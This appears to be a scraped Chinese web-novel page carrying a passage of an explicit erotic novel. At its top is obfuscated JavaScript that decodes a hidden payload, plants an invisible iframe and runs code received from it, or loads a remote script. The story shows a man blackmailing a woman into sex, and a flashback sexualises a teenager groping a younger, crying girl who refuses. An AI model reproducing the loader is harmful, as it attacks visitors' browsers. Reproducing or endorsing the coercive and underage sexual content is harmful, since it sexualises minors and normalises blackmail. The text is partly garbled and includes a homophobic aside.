bl 师尊受 h_男 同 高 h

撩妹情话 情感文学 2021-02-22 13:09:57 15 0
eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
快捷c作: 按键盘上方向键 ← 或 → 可快速上下翻页 按键盘上的 enter 键可回到本书目录页 按键盘上方向键 ↑ 可回到本页顶部! 如果本书没有阅读完,想下次继续接着阅读,可使用上方 ;amp;quot;收藏到我的浏览器;amp;quot; 功能 和 ;amp;quot;加入书签;amp;quot; 功能!顺隼矗顺墒侵苯哟拥叵峦3党∽吡恕!br /匡飞说完,长出一口气,‘怎么样,涛哥,是不是西洋景?反正我是第一次看两个女人搞。’‘你小子不是跟我胡说吧?’‘当然不是了,我骗谁也不能骗您啊,我要是胡说,就他妈让我不得好死。’一听主子不信,匡飞急忙对天发誓。〃这事你还跟谁说过?’侯龙涛眯着眼瞟着他。‘没有,没跟别人说过,就您一人。’‘好,你听清楚了。这事天知,地知,你知,我知,决不能再让第三个人知道。你又没有证据,要是万一传到了许总耳朵里,她要告你损坏名誉一类的罪,我也保不住你。’‘是,是,我知道了。’匡飞心中庆幸自己的嘴还算严,没到处乱说,也庆幸有侯龙涛这么一个大哥…躺在床上,手里的香烟冒着白烟,该怎么利用刚得到的资讯呢?直接去危胁许如云,别说自己没有任何证据,就算有,也不一定能镇的住她那样的老江湖。一个不小心,还可能偷j不成蚀把米,急了她,只能把事情越弄越糟。看来只能先从郑月玲下手,这个二十四岁的女秘书比起许如云来,应该好对付的多。可她们两人总是形影不离的,连住都是在一起,怎么才能搞定郑月玲,而不让许总起疑呢?还不能让茹嫣发觉。突然想到许总下星期要回美国述职,而下周末公司的全体员工都会到小汤山的温泉去旅游。茹嫣因为父亲刚做完手术,要照顾他,是不会去的。看来这是唯一的机会,也只能拼一下了…豪华大客车上,郑月玲一直在和其她几个秘书聊天,都是些女孩子家感兴趣的问题,侯龙涛也c不上嘴。又想到了小汤山,她一样会集体行动,自己还是没机会接近她。‘妈的,这不是把我往绝路上吗?’真是快烦死了。一行人在温泉要住三日两夜,第一天本就只有一个下午,几个女孩子果然是聚在一块,一起泡温泉,侯龙涛连话都没跟她们说上。第二天上午,几个女孩要他跟她们一起打网球。侯龙涛故意没系鞋带,当他跳起来接一个球后,一脚踩在自己的鞋带上,向后退出六、七步,狠狠的摔了个p蹲,逗的几个小秘书前仰后合。虽然几个人一起玩的很开心,可对侯龙涛并没有实质的帮助。他虽强装笑容,内心却是越来越急。吃完晚饭,大家都换了泳衣到楼下去游泳,侯龙涛虽没心情,可也无事可做,就也换了泳裤,准备下楼。当他路过月玲和另一个秘书的房间时,门是开着的,月玲正坐在床边看电视,跟本没换衣服。侯龙涛敲了一下门,‘怎么不下去啊?’‘我不想游。’月玲回过头来看着他。这一看可让她有点脸红了,平常侯龙涛总是穿着整齐,只能知道他的肩膀很宽,现在他可是只穿着一条小泳裤,一身漂亮的肌r尽露,泳裤里也是股股囊囊的一团。这让一个年轻的姑娘看了,怎么能没有想法呢?〃为什么不想游?’‘不想就是不想呗。’月玲费劲的移开自己的眼光。‘真的?’侯龙涛也真是没话找话了。‘我…我不会游,满意了吗?’月玲说起话来像个被惯坏了的大小姐。这个回答可是出乎意料,本以为是‘不方便’一类关于月经的事,没想到她是个旱鸭子。‘那你就一个人在屋里待着?’‘不然还怎么样啊?’侯龙涛走了进来,好像无意识的关上了门,又悄悄的上了锁。〃我陪你待会吧,一个人多无聊啊。’‘那好啊,咱们干点什么呢?’月玲说着就坐上了床,把床边的地方让给侯龙涛。月玲穿着一条紧绷的仔裤,就算是坐着,也能看出那被裹的紧紧的圆臀的形状,一件黑色的吊带小背心包着不大不小的茹房,两个茹头在上面顶出两个小点,明显是没戴胸罩。〃打会儿牌吧。’侯龙涛拿起桌上的一副扑克,‘敲三家会吧?三十分一结,差一分一百块。’‘赌钱啊?我可没你那么富。’月玲虽然工资很高,毕竟是个女孩,这种游戏还是不太适合她。侯龙涛也早就料到她的反应了,‘那我要赢了,你就让我亲一下;你要赢了,我就让你亲一下。’‘美的你啊,正反都是你占便宜。’‘那这样吧,赢的问输的一个问题,输的必须得说实话。’自信这个提意不会再被拒绝了,刺探别人的秘密是女人的天性,越年轻越是如此。月玲果然答应了,‘好,好,那快开始吧。’就扑克这个东西本身来说,运气是最重要的,只有在牌势相当的时候,技术才会起作用。侯龙涛第一局就输了。〃哈哈,你可不能赖啊。’月玲高兴的说。‘你问吧。’男人一副沮丧的样子。‘你的女朋友是谁,干什么的?’侯龙涛犹豫了一下,‘茹嫣。’‘茹…柳茹嫣?那个冷美人?’月玲真是像发现了新大陆,越来越觉的这个游戏好玩了。〃是啊,可你千万别跟别人说,要不然我可就有麻烦了,你知道公司是有规定的。’侯龙涛双手合实,做出一个作揖的动作。‘好,你放心,我给你保密。’说完又歪着头看着他,‘你们俩还真是挺配的。’接下来两局,侯龙涛又全输了。被问了两个很尴尬的问题:和茹嫣发展到什么地步了;何时失去的处男。他都如实的回答了。第四局,侯龙涛终于赢了,‘哈哈哈,可算轮到我了。’‘问吧,问吧。’月玲无所谓的说。侯龙涛突然变的严肃起来,‘为什么许总那么讨厌我?’‘啊?这…没有吧…’女孩没想到男人会有此一问,一时不知该怎么回答。〃没有?是人都能看的出来,要是有人知道为什么,那就是你了。我觉的我有权力知道我哪得罪她了。’‘我…’‘你不会是想耍赖吧?你们女孩就是这样,愿赌不能服输。算了,反正我也忍烦了,大不了我不干了,直接向总公司告她一状,非把她也拉上不可。’侯龙涛装作生气,站起来就要走。〃我…我说,可你一定不能去问云姐啊。’‘我也有把柄在你手里啊,就不怕你说吗?’一看有戏,又坐了下来。‘你没得罪过云姐。’月玲低着头,开始讲述许如云的故事。原来许如云二十二时就曾结过一次婚,本来还算美满,可两年后也没有子讯。找了个中医一查,说她是‘宫寒不孕’,这辈子也不能生孩子。她丈夫为这事就跟她离婚了,许如云没想到曾经对她海誓山盟的男人会如此无情无义,受了很大打击。那以后她就到美国读书,一心扑在学业上,用了八年就拿到了博士学位。进了iic后更是平步青云,一直坐到iic中国总经理的位子,负责整个亚太地区的业务。就在心灵上的伤口渐渐愈合的时候,侯龙涛的出现又让她想起了绝情的前夫。不知是侯龙涛的幸运,还是不幸,他长的很像许如云的前夫,都是高高大大,斯斯文文的,又留着相同的发形,脸形也是一摸一样。许如云就不自觉的对他很不友好,还时时找他的麻烦。虽然时间会证明这是侯龙涛的幸运,可现在他可不知道。本以为许如云是因为是同性恋才会讨厌男人,月玲也会很简单的说出这个原因,没想到却是有这么一段历史。但侯龙涛认为这与自己无关,‘那她也不能迁怒于我啊,说她公报私仇吧,又算不上。’看着男人生气的样子,月玲有点害怕了,‘云…云姐她真的是好人,你千万别报复她啊。’‘报复?她是我上司,我怎么报复她?不过倒是你啊,月玲,成了她的牺牲品。’此话一出,月玲更是不知所谓,‘我?牺牲品?什么意思?’‘你交过几个男朋友啊,跟几个男人上过床啊?’因为一开始女孩问的就是这方面的问题,现在侯龙涛问出来,也就不是显的太唐突。‘我…男朋友…上学时交过两个…没…没上过床…’女孩回答这样的问题,还是有点扭扭捏捏的。〃就是啊,说白了,你还什么好东西都没试过呢。她许如云是过来人了,该尝的甜头都尝了,拉着你这样的小姑娘玩同性恋的游戏,她也真狠的下心。’男人用上了他的杀手间,成败就在此一举了。‘你…你说什么…什么同性恋…我…我不明白…’月玲虽然极力的否认,但她慌张的神情和不连贯的话语,早就把她出卖了。同性恋在大陆并不被大众所接受,他们的活动仍处于半地下的状态,在社会上更是遭到冷遇、歧视,甚至是家人也不能容忍他们,所以月玲最开始的慌张和否认也就不足为奇了。(编者话:就我本人而言,对女同性恋的态度是五五开;男同性恋嘛,我是怎么也接受不了,简直就是恶心加缺心眼。)〃哼,’男人冷笑一声,‘你不认?你忘了上周六你们在公司里干的好事了?’‘你…你别胡说…’‘好,我胡说。前两天,保安部的人给了我一盘录影带,说是无意中拍到的,关于咱们公司周末加班人员的,不知该怎么处理,要我拿主意。你看我该怎么处理它呢?’侯龙涛这时已坐到了离月玲很近的地方。月玲也想起那天确实是有一个保安上过楼,更是对他的话深信不移了,‘你…你想怎么样?’‘你说呢?只要姓许的在公司一天,我就没好日子过,这是我唯一的机会把她拉下马。和下属在办公室里搞同,估计总公司也不会容忍这种事的。要是再让媒体知道了,别说你和那姓许的,就连公司的名誉也保不住。’说到这已是咬牙切齿了。月玲大学一毕业就进了iic,一直受到许如云的照顾。许如云三十五岁生日时,月玲在她家喝的烂醉,第二天一早才发现和许如云两个人光着p股躺在一张床上,yd里还c着一根假阳具。从那以后,两人就一直保持着这种不正常的关系。月玲从没跟男人睡过,也就没觉出有什么不好来,最近还搬去和许如云一起住。她的人生可谓是一帆风顺,从没遇到过什么麻烦和挫折,在家有父母疼,在学校里因为长的漂亮,也是男生追逐的物件,等工作了,又有许如云像姐姐一样宠着。今天被侯龙涛一吓,完全不知道该怎么应对,‘呜呜’的哭了起来。本以为这个女人跟着许如云这么多年,怎么也该学的精一点,没想到她只不过是一只被惯坏了的金丝雀,离开主人,就毫无自卫能力了,一吓就软。侯龙涛刚想好的一大套威胁的话都用不上了。看着月玲双手抱腿,把脸埋在膝头间哭泣的样子,是该由红脸变白脸的时候了。侯龙涛坐的更近了,搂住女人轻抖的肩膀,用极温柔的声音说:‘我要对付的只有姓许的一个人,这次把你迁连进来,真的不是我的本意。许如云她受过伤害,对男人不信任,我还能理解。可你又年轻又漂亮,别说没吃过男人的亏,就连男人的好处都没享受过,怎么就甘心和她做那种为人不齿的事呢?’〃你…你们男人…呜…有…有什么好…就连你…你不也是…呜…来欺负我…’月玲抬起头来看着侯龙涛,两人的脸靠的很近,彼此的呼吸都能感觉的到。侯龙涛又用上了他的拿手好戏,眼神中充满了爱怜,让女人不由的想到他并不是个坏人。〃我真的不想伤害你,可我要是不趁这个千载难逢的机会搞掉许总,我在iic也待不长了。我…’男人站起身来,一跺脚,‘就放过她一次。’接着就把自己和武大的事跟月玲说了,‘我敢保证将来我会后悔的,但我没法狠下心来毁了你,我会把那录影带处理掉的。’〃真的?’月玲没想到他会为了自己放弃大好前程,甚至不惜坐牢,感激之情自是不言而喻了,‘我…我会跟云姐求情的,我想…’‘没用的,有了能拔除眼中钉的机会,不是人人都能放弃的。’月玲也知道这是实话,许如云对侯龙涛的成见已深,是不会因为自己的一句话就改变的。〃那…那我能为你做点什么吗?任何事。’‘任何事?’男人转过身来,眼里放出奇异的光彩。‘只要我能做到,我一定会做的。’月玲也从床上下来了。〃你老实的告诉我一件事,难道你就从来没对男人感过兴趣?就对男人的身体一点也不好奇?’‘这…也…也不能说没有过,可…可云姐说…说和她那个的感觉跟和男人没区别的…’月玲想起刚才自己看见侯龙涛的身体时那种从没有过的感觉,不由的也对许如云的话产生了疑惑。〃我唯一的要求就是你能陪我一晚。’‘什么?’月玲没想到对方明知自己是同性恋,还会提出这种要求。侯龙涛在女人还在发愣的时候,已把她揽入了怀里,两张脸几乎贴在了一起,‘月玲,我喜欢你,从我第一天到公司,我就一直很在意你。’‘可…可你和茹嫣…’〃是,我也是真的喜欢她,可我是男人,花心是我的本性。我不知道自己是不是有毛病,一看到娇柔貌美的女人就忍不住要追求。可能是我把自己看的太重要了,总认为只有我一个人才能给女人幸福。本来我可以慢慢的让你爱上我,可现在,我的时间不多了,只求能好好的疼爱你一次。’侯龙涛绝对有信心,能让这个从没尝过r味的年青姑娘掉进自己的性a陷阱里,不能自拔,只要一次就足够了。〃我…可…’从女人脸上的表情就能看出她正做着强烈的思想斗争,只要再推她一下,她就会从悬崖边上掉下去了。‘你要是不答应,我也不会怪你的。我明白我面临着牢狱之灾,跟本没法给你任何承诺,你本身又不喜欢男人,我确实是有点一厢情愿了。全是因为我太喜欢你了,唉,真是对不起。’话虽如此,可抱着女人的手臂却没有一点放松。像侯龙涛这样‘优秀’的男人,在耳边倾吐‘真情’,已经是极大的诱惑,又想到他宁可坐牢,也要保全自己的名誉,本就不是真正的同性恋的月玲实是找不出拒绝的理由,‘我…我答应你…’〃真的!?’侯龙涛一脸的喜出望外。‘嗯…’月玲坚定的点点头,打定了献身的主意。雨点般的亲吻紧接着落到了她的脸上,‘啊,龙涛,去你的房间吧,我怕有人回来…’因为侯龙涛的级别高,自己有一个单间。两人拉着手,走过空无一人的走廊。侯龙涛把门锁上,看着背对着自己站在床前的女人,嘴角露出一丝y笑,轻拍一下泳裤中的老二,‘你争点气,要不然咱哥儿俩可就牢里见了。’从背后抱住月玲,双手直接伸进了背心里,抓住两个上翘的茹房揉捏着,‘玲儿…’舌头c进耳孔中钻着。‘啊…’女人闭上眼睛,微微抬头,两臂后伸,捏在男人坚实的p股上。捏了一阵,月玲扭过头来,张着嘴主动的求吻。男人的舌头刚一探进去,就被猛的吸住了,看来着个小妞已被许如云训练的很敏感了,只被玩了几下乃子,就情欲高涨了。手离开了涨大的茹房,一手攥住女人的一个臀瓣,一手解开她仔裤的扣子,c进了内k里。由于这种提裆的仔裤实在是太紧了,手指到了y唇的上方就再也下不去了,可也正好能按到y核。侯龙涛拚命的在那粒小r球上压揉着,大幅度的画圆。月玲和许如云玩的时候,总是要互相先在不重要的部位爱抚很久,可侯龙涛却上来就直奔要害。弄的月玲一下就快感如潮,光着的双脚向上垫起,两手也从男人的臀上换到了脖子上,用力向下拉,y户向前猛挺,y水狂流,就像杓在男人身上一样。〃啊…啊…涛…太激烈了…啊…受不了啊…’紧咬的牙缝中挤出一连串的娇叫。‘这就受不了了?还没真正开始呢,我一定要让你知道男人的好处。’侯龙涛心中一喜,这么嫩的女人,还不得被自己干疯了。拉住女人的裤腰,用力的一把拉到她的脚踝,圆滚的p股被带动的一阵乱颤。抓着两条滑嫩的大腿,从腿弯一路向上舔,在雪白p股蛋上轻咬一口,‘啊…涛…嗯…要…要啊…’月铃自己玩弄着y核,一手伸后,抓住男人的头发往自己臀r上按,她也不知为什么会如此的兴奋,这是和许如云搞时从来没有过的。把她转过身来,看着已被完全浸透了的r色的透明小内k,还有不少yy顺着大腿内侧流下来,真是起性,‘玲儿,躺下吧。’一抄脚踝,女人的上身就落在了床上,双腿还在床外。拉开她的内k,凸起的耻丘上只有一点短短的发茬,‘她给你刮的?’‘是…啊…’一歪头,像接吻一样,双唇对住两边大y唇,舌头c入张开的yd里活动着,大量滑腻的爱y涌入嘴中。一手按在极度勃起的y核上揉弄,一手抓住坚挺的茹房把玩。月玲双脚撑住床沿,p股离开了床面,一手猛攥床单,另一手的手背堵在嘴上,‘唔唔…嗯…’发出不知是喜是悲的声音。侯龙涛双手捏住美女的翘臀,舌头拚命的向小x里探,像要把头都挤进去一样。‘唔…啊…好舒服…好美…嗯…唔…’虽然极力的想控制住自己的呻吟,可浪语还是从指缝中钻了出来。男人的舌头跟女人的没什么不同,可男人更有现身精神,‘咻咻’的吸吮声不断从下身传来,月玲不用看,也知道侯龙涛是多么的卖力,以许如云高贵的身份,是从来也不曾在这种口舌服务上多下工夫的。不管是侯龙涛的技巧真的高出一截,还只是她的心理作用,月玲感到真正男人的舔舐是比那些虚龙假凤的强的太多了。就在男人的手指c入后t的一刻,强烈的电流窜过身体的每一个角落,从没被舔到泄身的美女,zg颈口大开,y精猛泄,达到了高c。侯龙涛自然是一滴不露,全含在了嘴里。男人脱下泳裤,压到月玲的身上,将满嘴yy,y精和口水的混合物渡了一半到女人的嘴里,‘咕嘟’一声咽下另一半,‘真是好喝啊。’月玲也咽了下去,酸酸碱碱的,跟本不像男人表现出的那么美味,更是芳心暗动。揽住他的脖子热吻了起来,一手向下,握住粗壮的男g,套弄起来。〃呼…玲儿,你真是会取悦男人。’虽然快感只是一般,侯龙涛却做出很受用的样子。‘真的吗?涛…我以后一直这么服侍你好不好?’月玲也感到了那种同性恋不可能享受到的,占有异性身体的满足感,急着表明自己的忠心。〃别急,宝贝,好戏还在后面呢。’说着,男人就起身站在她双腿间,膝盖前曲,顶在床沿上,拉着月玲的大腿,把大j巴对准鲜红的yd口,‘卜’的一声c了进去。〃九浅一深’的c法磨的美女难忍难奈,‘啊…啊…涛…痒死了…难受啊…快点…深点嘛…’两腿箍住侯龙涛的腰身,一挺一挺的用力向里拉,以求他能进入的更深。看到小妞也真是浪的可以了,男人上身趋前,握住粉嫩的茹房,一轮三百多下的急攻,干的月玲魂飞天外,‘啊…啊…啊…涛…涛…要死了啊…人家要被你弄死了…啊…’假阳具虽也够粗够长,但绝没真家伙那种火热的感觉,更不用说在速度和力量上的差距了。月玲有了这样的对比,更是对侯龙涛死心塌地了。又是一轮抽c过后,女人的双脚绷的笔直,花芯一收一放,吐出了精华。侯龙涛拚命忍过这一关,又让她到了两次高c,才飞快的抽出阳具,蹦上床,一p股坐在月玲的两个嫩r上,一手拉起她的头,一手猛掳了几下j巴,s在了美女的嘴里…怀里抱着高c后女人软绵绵的身子,在她嘴上吻了一下,‘玲儿,我还能让你满意吧?’‘嗯…’月玲满足的回吻了男人一下。‘那…等我进去后,你不要再和许总…找个爱你的男人吧。’ 侯龙涛抚着她的头发,说话的声音有些哽咽。〃不!我不要,我不要你坐牢,不要你离开我。’月玲撑起上身,扁着嘴看着他。‘我也不想离开你啊,可这事是不以咱们的意志能转移的。’看着美女已完全中了自己的套,真是苦在脸上,甜在心里。计划已成功了一半,真是天佑‘善’人啊。〃我…我说什么也要求云姐放过你,说不定她会看在以前的情份上…’‘你千万别,要是再让她知道我抢了她的女人,更得把我往死里整了。’这话可是太有道理了。〃可…可我…我怎么能就眼看着你…什么都不做呢?’月玲一下扑到侯龙涛身上,哭了起来。‘唉,让我再想想吧,说不定还能有办法。你先回房去吧,不要让你的同屋起疑心。’其实男人的心里已有了成形的方案,要是现在就说,岂不是穿了梆。月玲起身穿好了衣服,又回来抱住他,‘涛,我知道你不会只是我一个人的男人,可我已经离不开你了。为了我,为了茹嫣,你也一定要…’说到这,女人的声音已发不出来了。‘嗯,你放心,我一定。’…第二天早上,侯龙涛把月玲叫到屋里,两人先是一阵亲热,‘我昨晚想来想去,只有一个办法。’‘是什么?’月玲一听爱人有法消灾,简直要乐疯了。‘可是,要你出卖r体,我…’看到男人的脸上没有一点轻松的样子,女人的心里也是一沉,‘我不在乎,你告诉我,只要能救你,我什么都不怕。’侯龙涛说出了他的计划,‘这…能行吗?’月玲有点犹疑。‘我不知道,我真的不知道啊,我也只能想到这个办法。万一成功了,一切的麻烦就都解决了。’男人一脸苦恼的抱住头坐在床边上。‘好,就拼一下。云姐对我一直都很好,既然又能不伤到她,又能保全咱们,总是值得一试的。’月玲终于下了决心。第七章完第八章回首往事三天的温泉之旅结束了,趁着上班顺路,就到西单的民航营业厅去订两张机 票,老爸老妈要去海南旅游。走到一个坐在柜台后,低头写东西,穿着国航制服 的小姐面前,“小姐,我想订两张去海南的头等…陈倩!”看着小姐抬起的笑脸, 侯龙涛一下愣住了。这是一张曾无数次出现在梦中的清秀面庞,那个让他魂牵梦萦的女人,现在 就在面前。幸福来的太突然,往往让人难以接受。往事一幕幕的袭上心头,让侯 龙涛呆立在当场。七年前,十七岁的侯龙涛正在放高三前的暑假。一天刚刚和同学打完篮球, 骑着他那辆二四的小车回到院里,看到在自家的楼门口,靠墙站着一个姑娘,一 身白色的连衣裙,个子高高的。当年的侯龙涛已是一个到处追着女孩p股跑的小蜜蜂了,虽然他长的不是特 别帅,又不是有钱人,但他胆大、心细,外加脸皮厚,又够酷,还有那么点幽默 感,所以只被几个女孩子拒绝过,成功率还是很高的。他有个习惯,对每个见到的女孩都要看上两眼,漂亮的就上去臭贫一通,为 了这个也没少在外面打架。今天也不例外,骑着车到了女孩跟前。不看还好,一 看之下,整个人都傻了。女孩的美丽是笔墨无法形容的,侯龙涛把车一直骑进了 楼门d中,两眼却盯在女孩的脸上挪不开了。前轮顶到了一层的楼梯,人也从车上摔了下来。躺在地上的时候,看到女孩 冲着他捂嘴一笑,侯龙涛的脑子里只有“天使”二字。原来对漂亮女孩那股死皮 懒脸的劲一下不知飞到哪去了,连车也没锁就跑上了楼…后来把这事跟文龙一说,才知道女孩的名字叫陈倩,居然是文龙女朋友王丽 的朋友,那天是陪她的来找文龙的。侯龙涛掐着他的脖子直到他答应撮和两人。几天之后,王丽和陈倩又来了。因为文龙的父母都去上班了,四个人就在他 家里待着。聊了一会天,文龙就拉着王丽到里屋去打炮,留下侯龙涛和陈倩在客 厅里看电视。侯龙涛第一次在女人面前感到紧张,说起话来都前言不搭后语。他来到洗手 间,狠狠的给了自己两个大嘴巴,冲着镜子说:“放松,放松,你丫给我把这个 女人弄到手。”从洗手间出来,完全像换了一个人,虽然心里还是紧张的要死,表面上却也 谈笑风生,时不时逗的陈倩“咯咯”直笑。后来两人就开始打牌,玩的是只有小 小孩才打的“拉大车”,侯龙涛都快被闷死了,可看着梦幻般的美少女开心的样 子,也就不在乎了。侯龙涛连输了好几把,会“拉大车”的人都知道,要想分出输赢是多么的不 易,他竟连输了好几把,足见其心不在牌上。他的注意力全集中在陈倩的身上, 女孩的一颦一笑他都看在眼里,记在心里。陈倩是趴在宽大的沙发上,侯龙涛坐的也很舒服,斜歪在上面,两人的头都 快碰到一起了。闻着从近在咫尺的长发上飘来的发香,少年心中的魔兽被唤醒了, “忍不了了,她太美了,我要占有她。有了她,我以后再也不看别的女人一眼, 这也算对得起她了。”就在女孩又赢了一局,坐起身来时,侯龙涛猛的把她又压了下去,照着她的 樱唇吻了下去。豪无防备的美少女一侧头,少年的吻就落在了她白玉般的脸蛋上。 虽没达到目的,但一样是满口留香,更是让男人情火雄燃。双手抱的更紧了,非 要亲到她不可。陈倩出奇的镇静,并没有喊叫,只是不停的晃着头,不让男人得逞。虽然侯 龙涛比女孩大两岁,这时却显的很不成熟,一手掐住陈倩的双颊,让她没法躲避, 终于占有了她的双唇,舌头用力的向她嘴里挤。但陈倩的银牙紧咬,就是不准他 进入,也只好只在整齐雪白的牙齿和粉嫩的牙龈上来回来去的舔。陈倩穿的是一件牛仔布的吊带连衣裙,里面还穿了一件黑色的短袖衫,下身 是r色的长丝袜和平底的凉鞋。说实话,是一套不怎么样的搭配,但她的美貌完 全掩盖了着装上的不协调。侯龙涛的手伸进了裙子里,直奔下y,手指刚刚碰到内k,女孩突然挣扎了 起来,“不…不要!”赶快抽回手,对着她一通乱吻。过了一会儿,便开始第二 次尝试。这次不顾姑娘的反抗,手指坚决的拨开了她内k的裆部,摸到了两片娇 嫩无比的y唇。碰到那媚r的一刻,指尖产生了仿佛要被融化了一样的感觉。陈倩的挣扎更厉害了,“不要…别这样…求求你…”眼泪已在眼眶中打转了。 侯龙涛的心一下软了下来,撤出了手,把美少女抱坐在大腿上,在她脸上亲了一 下,“你叫的就像我要qg你似的。”陈倩没有回答,只是红着脸看着他。少女 水汪汪的眼睛,简直把男人的魂都勾走了,又在女孩的脖子上吻了起来。悄悄拉 开她的拉链,手从后面快速的c入衣服里,抓住了r罩中的茹房。胸部已落入敌手,陈倩只是略微摇动了几下身子,就放弃了抵抗。不赢一握 的茹房柔软之极,真是让人爱不释手。就在这时,文龙干完了王丽,从里屋走了 出来。身上的女孩“啊”的一声轻叫,侯龙涛知道她害羞,急忙起身,把文龙挡 在了过道里,“你他妈出来干嘛?滚回屋里再待会儿。”文龙“嘿嘿”一笑,“那你丫一会儿得请我去游戏厅。”“行,行,快滚吧 你。”看着文龙又进了屋,才回到那个他一刻也不想离开的女孩身边。搂着她的 细腰,在圆润的膝头上轻抚着,又在柔软的嘴唇上吻了一下。陈倩扶着侯龙涛的 肩头,“我现在算是你的女朋友吗?”“只要你愿意。”“你大爷,”侯龙涛在心里骂着自己,“这么美的女孩你丫见过吗?她问你 她是不是你的女朋友,除了‘是’,其它的回答都是愚蠢的,什么叫‘只要你愿 意’啊?你个傻x。”“我从来也没让别的男孩这么碰过我。”陈倩低下头,脸 上的红晕更浓。“天啊,我太爱她了。”看着女孩柔柔弱弱,楚楚可怜的样子,一种从没有 过的责任感油然而生。侯龙涛一句话也说不出来,只知紧紧的拉着女孩的双手, 不停的亲吻…西便门的一个游戏厅里,走进两个大男孩。几个已经在里面玩的人跟他们打 着招呼,“龙涛,文龙。”“涛哥,文龙,怎么才来啊?”一边玩着街机的《三 国志》,一边给文龙讲了和陈倩的事,“她是不是特嫩啊?”“也不是吧,”文龙叼着烟漫不经心的回答,“我们学校里几个高三的经常 对她搂搂抱抱的,小姑娘也不敢说什么。不过像你这么揉她,大概是第一次。” “砰”侯龙涛狠狠的在游戏机上踢了一脚,不光是文龙,所有在场的人都吓了一 跳,老板虽很心疼机器,可对这些天天在这片混的小痞子也不敢说什么。“我c他妈,是谁?我埋了他们丫那。”文龙还是第一次看侯龙涛这么生气, “四哥,算了吧,他们都毕业了,上哪找去啊。”侯龙涛真是快要气疯了,也更 